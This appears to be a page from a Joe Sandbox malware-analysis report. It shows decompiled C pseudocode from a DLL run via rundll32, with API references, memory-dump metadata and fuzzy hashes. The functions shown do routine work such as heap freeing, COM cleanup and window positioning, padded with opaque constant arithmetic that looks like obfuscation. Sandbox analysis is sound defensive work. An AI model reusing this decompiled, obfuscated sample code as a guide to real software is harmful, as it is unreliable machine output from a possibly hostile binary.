						 *0x1004f820 = 0x10019589;
					} else {
						_t12 = GetModuleHandleA("kernel32.dll");
						if(_t12 == 0) {
							goto L4;
						} else {
							_t9 = GetProcAddress(_t12, "InitializeCriticalSectionAndSpinCount");
							 *0x1004f820 = _t9;
							if(_t9 == 0) {
								goto L4;
							}
						}
					}
				}
				 *(_t16 - 4) =  *(_t16 - 4) & 0x00000000;
				 *((intOrPtr*)(_t16 - 0x20)) =  *_t9( *((intOrPtr*)(_t16 + 8)),  *((intOrPtr*)(_t16 + 0xc)));
				 *(_t16 - 4) =  *(_t16 - 4) | 0xffffffff;
				return E1001254F(_t10);
			}









                                                                                                            0x10019599
                                                                                                            0x1001959b
                                                                                                            0x100195a0
                                                                                                            0x100195a5
                                                                                                            0x100195ac
                                                                                                            0x100195b5
                                                                                                            0x100195db
                                                                                                            0x100195db
                                                                                                            0x100195e0
                                                                                                            0x100195b7
                                                                                                            0x100195bc
                                                                                                            0x100195c4
                                                                                                            0x00000000
                                                                                                            0x100195c6
                                                                                                            0x100195cc
                                                                                                            0x100195d2
                                                                                                            0x100195d9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100195d9
                                                                                                            0x100195c4
                                                                                                            0x100195b5
                                                                                                            0x100195e5
                                                                                                            0x100195f1
                                                                                                            0x1001961a
                                                                                                            0x10019623

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,10042D28,00000010,100139E9,00000000,00000FA0,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 100195BC
                                                                                                            • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 100195CC
                                                                                                            Strings
                                                                                                            • InitializeCriticalSectionAndSpinCount, xrefs: 100195C6
                                                                                                            • kernel32.dll, xrefs: 100195B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                                                            • API String ID: 1646373207-3733552308
                                                                                                            • Opcode ID: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
                                                                                                            • Instruction ID: 1db327cb421c3a6b8c58775e1e461de9fba8f787e71f0b035f5b3f69bb676500
                                                                                                            • Opcode Fuzzy Hash: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
                                                                                                            • Instruction Fuzzy Hash: 05F05E70600656EFEB02EFA58D98B9D3AF2FB45345B114169F410EE160EB35D6809B28
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10004DD0 Relevance: 6.2, APIs: 4, Instructions: 188memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E10004DD0() {
				void* _t51;
				signed int _t53;
				signed int _t59;
				signed int _t61;
				intOrPtr _t82;
				signed int _t96;
				signed int _t103;
				signed int _t111;
				signed int _t112;
				signed int _t120;
				signed int _t121;
				signed int _t125;
				signed int _t132;
				signed int _t139;
				signed int _t142;
				signed int _t151;
				intOrPtr _t157;
				signed int _t159;
				signed int _t162;
				signed int _t163;
				void* _t164;
				signed int _t166;
				signed int _t173;
				signed int _t177;
				signed int _t189;
				void* _t195;
				void* _t196;

				_t164 =  *(_t195 + 0xc);
				if(_t164 != 0) {
					if( *((intOrPtr*)(_t164 + 0x10)) != 0) {
						_t132 =  *0x1004b0e0; // 0x0
						_t103 =  *0x1004b0dc; // 0x0
						_t151 =  *0x1004b0e8; // 0x0
						_t162 =  *0x1004b0e4; // 0x0
						_t82 =  *((intOrPtr*)(_t164 + 4));
						_t163 =  *0x1004b0ec; // 0x0
						 *((intOrPtr*)( *((intOrPtr*)( *_t164 + 0x28)) + ((_t103 * _t132 * _t151 + _t162 * 2) * _t151 + _t132 * _t132 - _t162 - _t163) * 4 + _t82))(_t82, 0, 0);
					}
					_t111 =  *0x1004b0dc; // 0x0
					_t53 =  *0x1004b0e8; // 0x0
					_t166 =  *0x1004b0ec; // 0x0
					_t10 = _t111 + 1; // 0x1
					_t112 =  *0x1004b0e0; // 0x0
					 *0x1004d3e0(((_t112 - _t166 << 1) - _t10 * _t111 -  *0x1004b0e4 + _t53 *  *0x1004b0d8 << 5) +  *((intOrPtr*)(_t164 + 0x30)));
					_t196 = _t195 + 4;
					if( *((intOrPtr*)(_t164 + 8)) == 0) {
						L9:
						_t157 =  *((intOrPtr*)(_t164 + 4));
						if(_t157 != 0) {
							_t59 =  *0x1004b0dc; // 0x0
							_t120 =  *0x1004b0ec; // 0x0
							_t139 =  *0x1004b0e8; // 0x0
							_t121 =  *0x1004b0e0; // 0x0
							 *((intOrPtr*)(_t164 + 0x20))(_t157, 0, (_t59 * _t120 + 1 + _t139 *  *0x1004b0d8 * 0x3fffffff) * _t120 + (_t139 + 1 + _t121 * 0x3fffffff) *  *0x1004b0e4 + 0x2000 + _t121 * 2 - _t59 << 2,  *((intOrPtr*)(_t164 + 0x34)));
						}
						return HeapFree(GetProcessHeap(), 0, _t164);
					} else {
						_t125 =  *0x1004b0e0; // 0x0
						_t159 =  *0x1004b0ec; // 0x0
						_t173 =  *0x1004b0dc; // 0x0
						_t142 =  *0x1004b0d8; // 0x0
						_t61 =  *0x1004b0e4; // 0x0
						_t12 = _t125 + 1; // 0x1
						 *(_t196 + 0x18) = 0;
						if( *((intOrPtr*)(_t164 + 0xc)) - (_t173 * _t142 + _t12 * _t159 + _t61 << 1) <= 0) {
							L8:
							 *0x1004d3e0((_t61 << 4) - ((_t142 * _t142 << 4) + 0x10) * _t159 +  *((intOrPtr*)(_t164 + 8)));
							_t196 = _t196 + 4;
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t96 =  *0x1004b0dc; // 0x0
							_t177 =  *0x1004b0e8; // 0x0
							 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t164 + 8));
							if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)) + ( *(_t196 + 0x18) + ((_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 2 + (_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 4)) != 0) {
								_t189 =  *0x1004b0e4; // 0x0
								_t25 = _t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 - 2; // -268742890
								 *((intOrPtr*)(_t164 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x14)) + ((_t125 - (_t142 * _t142 << 1) + _t125 + 2) *  *0x1004b0e4 +  *((intOrPtr*)(_t196 + 0x1c)) + (_t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 + _t25) * _t96 + (_t159 + 1) * _t125 * 2) * 4)),  *((intOrPtr*)(_t164 + 0x34)));
								_t142 =  *0x1004b0d8; // 0x0
								_t159 =  *0x1004b0ec; // 0x0
								_t125 =  *0x1004b0e0; // 0x0
								_t96 =  *0x1004b0dc; // 0x0
								_t196 = _t196 + 8;
							}
							_t61 =  *0x1004b0e4; // 0x0
							 *(_t196 + 0x18) =  *(_t196 + 0x18) + 1;
							_t37 = _t125 + 1; // 0x1
						} while ( *(_t196 + 0x18) <  *((intOrPtr*)(_t164 + 0xc)) - (_t96 * _t142 + _t37 * _t159 + _t61 << 1));
						goto L8;
					}
				}
				return _t51;
			}






























                                                                                                            0x10004dd2
                                                                                                            0x10004dd8
                                                                                                            0x10004de6
                                                                                                            0x10004de8
                                                                                                            0x10004dee
                                                                                                            0x10004df4
                                                                                                            0x10004dfd
                                                                                                            0x10004e06
                                                                                                            0x10004e1d
                                                                                                            0x10004e2f
                                                                                                            0x10004e2f
                                                                                                            0x10004e31
                                                                                                            0x10004e37
                                                                                                            0x10004e43
                                                                                                            0x10004e4c
                                                                                                            0x10004e52
                                                                                                            0x10004e6c
                                                                                                            0x10004e75
                                                                                                            0x10004e7a
                                                                                                            0x10004fbd
                                                                                                            0x10004fbd
                                                                                                            0x10004fc2
                                                                                                            0x10004fc7
                                                                                                            0x10004fcc
                                                                                                            0x10004fd3
                                                                                                            0x10004ff4
                                                                                                            0x1000501f
                                                                                                            0x10005022
                                                                                                            0x00000000
                                                                                                            0x10004e80
                                                                                                            0x10004e80
                                                                                                            0x10004e86
                                                                                                            0x10004e8c
                                                                                                            0x10004e92
                                                                                                            0x10004e98
                                                                                                            0x10004ea0
                                                                                                            0x10004eb3
                                                                                                            0x10004ebb
                                                                                                            0x10004f9b
                                                                                                            0x10004fb4
                                                                                                            0x10004fba
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10004ec1
                                                                                                            0x10004ec1
                                                                                                            0x10004ec4
                                                                                                            0x10004eca
                                                                                                            0x10004ed0
                                                                                                            0x10004ef3
                                                                                                            0x10004efc
                                                                                                            0x10004f1d
                                                                                                            0x10004f51
                                                                                                            0x10004f54
                                                                                                            0x10004f5a
                                                                                                            0x10004f60
                                                                                                            0x10004f66
                                                                                                            0x10004f6c
                                                                                                            0x10004f6c
                                                                                                            0x10004f76
                                                                                                            0x10004f7c
                                                                                                            0x10004f80
                                                                                                            0x10004f91
                                                                                                            0x00000000
                                                                                                            0x10004ec1
                                                                                                            0x10004e7a
                                                                                                            0x1000503a

                                                                                                            APIs
                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10004E6C
                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10004FB4
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 10005028
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 1000502F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??3@Heap$FreeProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 834397476-0
                                                                                                            • Opcode ID: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
                                                                                                            • Instruction ID: 9f87828e50faab3a5d058e3d57900a61c1aef8edd5c1bc6d424dad7412e7468d
                                                                                                            • Opcode Fuzzy Hash: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
                                                                                                            • Instruction Fuzzy Hash: 94719631200B158FE318DF6CCEC5A57B7A9FB89341B05C52ED926CB7A5E670E905CB48
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000E9AF Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 69%
                                                                                                            			E1000E9AF(intOrPtr __ecx, intOrPtr* __edi) {
				void* __ebx;
				void* __esi;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr _t89;
				intOrPtr* _t90;
				void* _t91;
				intOrPtr _t104;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t148;
				intOrPtr* _t161;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				intOrPtr _t167;
				intOrPtr* _t168;
				void* _t170;
				intOrPtr _t183;

				_t161 = __edi;
				E10011BF0(0x1003af91, _t170);
				_t167 = __ecx;
				 *((intOrPtr*)(_t170 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x1004060c;
				 *(_t170 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t121 =  *((intOrPtr*)(__ecx + 0x50));
					if(_t121 != 0) {
						_t122 =  *_t121;
						_push(_t170 - 0x14);
						_push(0x10043208);
						_push(_t122);
						if( *((intOrPtr*)( *_t122))() >= 0) {
							_t124 =  *((intOrPtr*)(_t170 - 0x14));
							_push(_t170 - 0x10);
							_push(0x10043348);
							 *((intOrPtr*)(_t170 - 0x10)) = 0;
							_push(_t124);
							if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
								_t128 =  *((intOrPtr*)(_t170 - 0x10));
								 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
								_t130 =  *((intOrPtr*)(_t170 - 0x10));
								 *((intOrPtr*)( *_t130 + 8))(_t130);
							}
							_t126 =  *((intOrPtr*)(_t170 - 0x14));
							 *((intOrPtr*)( *_t126 + 8))(_t126);
						}
					}
				}
				_push(_t161);
				L8:
				if( *((intOrPtr*)(_t167 + 0x24)) != 0) {
					_t161 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x1c)) + 8));
					 *((intOrPtr*)( *((intOrPtr*)( *_t161)) + 0xbc))( *((intOrPtr*)(_t161 + 8)), 0);
					 *((intOrPtr*)( *_t161 + 0x94)) = 0;
					goto L8;
				}
				 *((intOrPtr*)(_t170 - 0x18)) = _t167 + 0x18;
				E1001E047(_t167 + 0x18);
				if( *((intOrPtr*)(_t167 + 0x40)) == 0) {
					L16:
					_t87 =  *((intOrPtr*)(_t167 + 8));
					if(_t87 != 0) {
						 *((intOrPtr*)( *_t87 + 8))(_t87);
					}
					_t88 =  *((intOrPtr*)(_t167 + 0xc));
					if(_t88 != 0) {
						 *((intOrPtr*)( *_t88 + 8))(_t88);
					}
					if( *((intOrPtr*)(_t167 + 0x14)) == 0) {
						L29:
						_t89 =  *((intOrPtr*)(_t167 + 0x34));
						if(_t89 != 0) {
							__imp__CoTaskMemFree(_t89);
						}
						_t138 =  *((intOrPtr*)(_t167 + 0x54));
						if( *((intOrPtr*)(_t167 + 0x54)) != 0) {
							E1000DA8C(_t138, _t161,  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x50)))));
							E10009EC5( *((intOrPtr*)(_t167 + 0x54)));
						}
						_t162 =  *((intOrPtr*)(_t167 + 0x54));
						_t195 = _t162;
						if(_t162 != 0) {
							E10009EC5(_t162);
							_push(_t162);
							L1001F7A9(0, _t162, _t167, _t195);
						}
						_t163 =  *((intOrPtr*)(_t167 + 0x50));
						_t196 = _t163;
						if(_t163 != 0) {
							E1000E731(_t163, _t196);
							_push(_t163);
							L1001F7A9(0, _t163, _t167, _t196);
						}
						_t90 =  *((intOrPtr*)(_t167 + 0x4c));
						if(_t90 != 0) {
							 *((intOrPtr*)( *_t90 + 8))(_t90);
						}
						_t168 =  *((intOrPtr*)(_t167 + 0x48));
						if(_t168 != 0) {
							 *((intOrPtr*)( *_t168 + 8))(_t168);
						}
						 *(_t170 - 4) =  *(_t170 - 4) | 0xffffffff;
						_t91 = E1001E10D( *((intOrPtr*)(_t170 - 0x18)));
						 *[fs:0x0] =  *((intOrPtr*)(_t170 - 0xc));
						return _t91;
					} else {
						 *((intOrPtr*)(_t170 - 0x10)) = 0;
						if( *((intOrPtr*)(_t167 + 0x10)) <= 0) {
							L28:
							__imp__CoTaskMemFree( *((intOrPtr*)(_t167 + 0x14)));
							goto L29;
						}
						_t165 = 0;
						do {
							_t104 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)) + 4));
							 *((intOrPtr*)(_t170 - 0x14)) = _t104;
							if(_t104 == 0) {
								goto L25;
							} else {
								goto L24;
							}
							do {
								L24:
								 *((intOrPtr*)( *((intOrPtr*)(E10006D96(_t170 - 0x14))) + 0x94)) = 0;
							} while ( *((intOrPtr*)(_t170 - 0x14)) != 0);
							L25:
							E1001E047( *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24)));
							_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 0x14)) + _t165 + 0x24));
							if(_t148 != 0) {
								 *((intOrPtr*)( *_t148 + 4))(1);
							}
							 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 1;
							_t165 = _t165 + 0x28;
						} while ( *((intOrPtr*)(_t170 - 0x10)) <  *((intOrPtr*)(_t167 + 0x10)));
						goto L28;
					}
				}
				_t161 = 0;
				if( *((intOrPtr*)(_t167 + 0x38)) <= 0) {
					L14:
					if(_t183 != 0) {
						_push( *((intOrPtr*)(_t167 + 0x3c)));
						L1001F7A9(0, _t161, _t167, _t183);
						_push( *((intOrPtr*)(_t167 + 0x40)));
						L1001F7A9(0, _t161, _t167, _t183);
					}
					goto L16;
				}
				 *((intOrPtr*)(_t170 - 0x10)) = 0;
				do {
					__imp__#9( *((intOrPtr*)(_t167 + 0x40)) +  *((intOrPtr*)(_t170 - 0x10)));
					 *((intOrPtr*)(_t170 - 0x10)) =  *((intOrPtr*)(_t170 - 0x10)) + 0x10;
					_t161 = _t161 + 1;
				} while (_t161 <  *((intOrPtr*)(_t167 + 0x38)));
				_t183 =  *((intOrPtr*)(_t167 + 0x38));
				goto L14;
			}


























                                                                                                            0x1000e9af
                                                                                                            0x1000e9b4
                                                                                                            0x1000e9be
                                                                                                            0x1000e9c0
                                                                                                            0x1000e9c3
                                                                                                            0x1000e9ce
                                                                                                            0x1000e9d1
                                                                                                            0x1000e9d3
                                                                                                            0x1000e9d8
                                                                                                            0x1000e9da
                                                                                                            0x1000e9e1
                                                                                                            0x1000e9e2
                                                                                                            0x1000e9e7
                                                                                                            0x1000e9ec
                                                                                                            0x1000e9ee
                                                                                                            0x1000e9f4
                                                                                                            0x1000e9f5
                                                                                                            0x1000e9fa
                                                                                                            0x1000e9ff
                                                                                                            0x1000ea05
                                                                                                            0x1000ea07
                                                                                                            0x1000ea10
                                                                                                            0x1000ea13
                                                                                                            0x1000ea19
                                                                                                            0x1000ea19
                                                                                                            0x1000ea1c
                                                                                                            0x1000ea22
                                                                                                            0x1000ea22
                                                                                                            0x1000e9ec
                                                                                                            0x1000e9d8
                                                                                                            0x1000ea25
                                                                                                            0x1000ea44
                                                                                                            0x1000ea47
                                                                                                            0x1000ea2b
                                                                                                            0x1000ea36
                                                                                                            0x1000ea3e
                                                                                                            0x00000000
                                                                                                            0x1000ea3e
                                                                                                            0x1000ea4c
                                                                                                            0x1000ea4f
                                                                                                            0x1000ea57
                                                                                                            0x1000ea91
                                                                                                            0x1000ea91
                                                                                                            0x1000ea96
                                                                                                            0x1000ea9b
                                                                                                            0x1000ea9b
                                                                                                            0x1000ea9e
                                                                                                            0x1000eaa3
                                                                                                            0x1000eaa8
                                                                                                            0x1000eaa8
                                                                                                            0x1000eaae
                                                                                                            0x1000eb1d
                                                                                                            0x1000eb1d
                                                                                                            0x1000eb22
                                                                                                            0x1000eb25
                                                                                                            0x1000eb25
                                                                                                            0x1000eb2b
                                                                                                            0x1000eb30
                                                                                                            0x1000eb37
                                                                                                            0x1000eb3f
                                                                                                            0x1000eb3f
                                                                                                            0x1000eb44
                                                                                                            0x1000eb47
                                                                                                            0x1000eb49
                                                                                                            0x1000eb4d
                                                                                                            0x1000eb52
                                                                                                            0x1000eb53
                                                                                                            0x1000eb58
                                                                                                            0x1000eb59
                                                                                                            0x1000eb5c
                                                                                                            0x1000eb5e
                                                                                                            0x1000eb62
                                                                                                            0x1000eb67
                                                                                                            0x1000eb68
                                                                                                            0x1000eb6d
                                                                                                            0x1000eb6e
                                                                                                            0x1000eb74
                                                                                                            0x1000eb79
                                                                                                            0x1000eb79
                                                                                                            0x1000eb7c
                                                                                                            0x1000eb81
                                                                                                            0x1000eb86
                                                                                                            0x1000eb86
                                                                                                            0x1000eb8c
                                                                                                            0x1000eb90
                                                                                                            0x1000eb9a
                                                                                                            0x1000eba2
                                                                                                            0x1000eab0
                                                                                                            0x1000eab3
                                                                                                            0x1000eab6
                                                                                                            0x1000eb14
                                                                                                            0x1000eb17
                                                                                                            0x00000000
                                                                                                            0x1000eb17
                                                                                                            0x1000eab8
                                                                                                            0x1000eaba
                                                                                                            0x1000eac1
                                                                                                            0x1000eac6
                                                                                                            0x1000eac9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000eacb
                                                                                                            0x1000eacb
                                                                                                            0x1000eae0
                                                                                                            0x1000eae0
                                                                                                            0x1000eae8
                                                                                                            0x1000eaef
                                                                                                            0x1000eaf7
                                                                                                            0x1000eafd
                                                                                                            0x1000eb03
                                                                                                            0x1000eb03
                                                                                                            0x1000eb06
                                                                                                            0x1000eb0c
                                                                                                            0x1000eb0f
                                                                                                            0x00000000
                                                                                                            0x1000eaba
                                                                                                            0x1000eaae
                                                                                                            0x1000ea59
                                                                                                            0x1000ea5e
                                                                                                            0x1000ea7d
                                                                                                            0x1000ea7d
                                                                                                            0x1000ea7f
                                                                                                            0x1000ea82
                                                                                                            0x1000ea87
                                                                                                            0x1000ea8a
                                                                                                            0x1000ea90
                                                                                                            0x00000000
                                                                                                            0x1000ea7d
                                                                                                            0x1000ea60
                                                                                                            0x1000ea63
                                                                                                            0x1000ea6a
                                                                                                            0x1000ea70
                                                                                                            0x1000ea74
                                                                                                            0x1000ea75
                                                                                                            0x1000ea7a
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeTask$ClearH_prologVariant
                                                                                                            • String ID:
                                                                                                            • API String ID: 82050969-0
                                                                                                            • Opcode ID: 49f28926b3a515cc494aedc195bb947ea9c7f92216f3cce8caedecae21e31748
                                                                                                            • Instruction ID: 43d2ea8d123215d3b84d8545f0b19a771d1917bb58f1b2237b0c9da6e0f617ce
                                                                                                            • Opcode Fuzzy Hash: 49f28926b3a515cc494aedc195bb947ea9c7f92216f3cce8caedecae21e31748
                                                                                                            • Instruction Fuzzy Hash: 3E712675A00682DFDB24CFA4C9C486AB7F5FF49380715486DE156AB665CB30FC81CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000E58F Relevance: 6.2, APIs: 4, Instructions: 165windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 63%
                                                                                                            			E1000E58F(void* __ecx, void* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr* _t62;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t84;
				void* _t107;
				void* _t126;
				intOrPtr _t130;
				intOrPtr* _t131;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t135;
				intOrPtr _t136;
				void* _t137;

				_t126 = __edx;
				_t135 = __ecx;
				_t130 = E10023092( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 0x24)));
				_v12 = _t130;
				_t58 = IsWindowVisible( *(_t130 + 0x1c));
				asm("sbb eax, eax");
				_t60 =  ~_t58 + 1;
				_v24 = _t60;
				_t107 = 0;
				if(_t60 != 0) {
					GetWindowRect( *(E100220EE(_t137, GetDesktopWindow()) + 0x1c),  &_v56);
					GetWindowRect( *(_t130 + 0x1c),  &_v40);
					asm("cdq");
					asm("cdq");
					E1002036F(_t130, _v56.right - _v56.left - _t126 >> 1, _v56.bottom - _v56.top - _t126 >> 1, _t107, _t107, _t107);
					E100203AD(_t130, 1);
				}
				_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
				_t131 = _t135 + 0x48;
				_push(_t131);
				_push(0x100405f8);
				_push(_t62);
				if( *((intOrPtr*)( *_t62))() < 0) {
					_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
					_t66 =  *((intOrPtr*)( *_t65))(_t65, 0x10040550,  &_v16);
					if(_t66 >= _t107) {
						_t67 = _v16;
						 *((intOrPtr*)( *_t67 + 0x14))(_t67,  &_v20);
						_t69 = _v16;
						 *((intOrPtr*)( *_t69 + 8))(_t69);
						_t71 = _v20;
						if(_t71 != _t107) {
							_t133 = _t135 + 8;
							_v8 =  *((intOrPtr*)( *_t71))(_t71, 0x10042ff8, _t133);
							_t73 = _v20;
							 *((intOrPtr*)( *_t73 + 8))(_t73);
							_t66 = _v8;
							if(_t66 >= _t107) {
								_t134 =  *_t133;
								 *((intOrPtr*)( *_t134))(_t134, 0x10042fe8, _t135 + 0xc);
								goto L14;
							}
						} else {
							_t66 = 0x80004005;
						}
					}
				} else {
					_t84 =  *_t131;
					_t134 = _t135 + 0x4c;
					_v8 =  *((intOrPtr*)( *_t84 + 0xc))(_t84, _t107, 0x10043298, _t134);
					if( *_t134 == _t107) {
						_v8 = 0x80004003;
					}
					if(_v8 >= _t107) {
						L14:
						_t136 = E1000E14F(_t107, _t135, _t134, _t135);
						if(_v24 != _t107) {
							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E100203AD(_v12, _t107);
						}
						_t66 = _t136;
					} else {
						if(_v24 != _t107) {
							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
							E100203AD(_v12, _t107);
						}
						_t66 = _v8;
					}
				}
				return _t66;
			}

































                                                                                                            0x1000e58f
                                                                                                            0x1000e597
                                                                                                            0x1000e5a5
                                                                                                            0x1000e5aa
                                                                                                            0x1000e5ad
                                                                                                            0x1000e5b5
                                                                                                            0x1000e5b7
                                                                                                            0x1000e5ba
                                                                                                            0x1000e5bd
                                                                                                            0x1000e5be
                                                                                                            0x1000e5d3
                                                                                                            0x1000e5e0
                                                                                                            0x1000e5ed
                                                                                                            0x1000e5fd
                                                                                                            0x1000e603
                                                                                                            0x1000e60c
                                                                                                            0x1000e60c
                                                                                                            0x1000e614
                                                                                                            0x1000e619
                                                                                                            0x1000e61c
                                                                                                            0x1000e61d
                                                                                                            0x1000e622
                                                                                                            0x1000e627
                                                                                                            0x1000e688
                                                                                                            0x1000e697
                                                                                                            0x1000e69b
                                                                                                            0x1000e6a1
                                                                                                            0x1000e6ab
                                                                                                            0x1000e6ae
                                                                                                            0x1000e6b4
                                                                                                            0x1000e6b7
                                                                                                            0x1000e6bc
                                                                                                            0x1000e6c7
                                                                                                            0x1000e6d3
                                                                                                            0x1000e6d6
                                                                                                            0x1000e6dc
                                                                                                            0x1000e6df
                                                                                                            0x1000e6e4
                                                                                                            0x1000e6e6
                                                                                                            0x1000e6f4
                                                                                                            0x00000000
                                                                                                            0x1000e6f4
                                                                                                            0x1000e6be
                                                                                                            0x1000e6be
                                                                                                            0x1000e6be
                                                                                                            0x1000e6bc
                                                                                                            0x1000e629
                                                                                                            0x1000e629
                                                                                                            0x1000e62d
                                                                                                            0x1000e63d
                                                                                                            0x1000e640
                                                                                                            0x1000e642
                                                                                                            0x1000e642
                                                                                                            0x1000e64c
                                                                                                            0x1000e6f6
                                                                                                            0x1000e700
                                                                                                            0x1000e702
                                                                                                            0x1000e71c
                                                                                                            0x1000e725
                                                                                                            0x1000e725
                                                                                                            0x1000e72a
                                                                                                            0x1000e652
                                                                                                            0x1000e655
                                                                                                            0x1000e66f
                                                                                                            0x1000e678
                                                                                                            0x1000e678
                                                                                                            0x1000e67d
                                                                                                            0x1000e67d
                                                                                                            0x1000e64c
                                                                                                            0x1000e730

                                                                                                            APIs
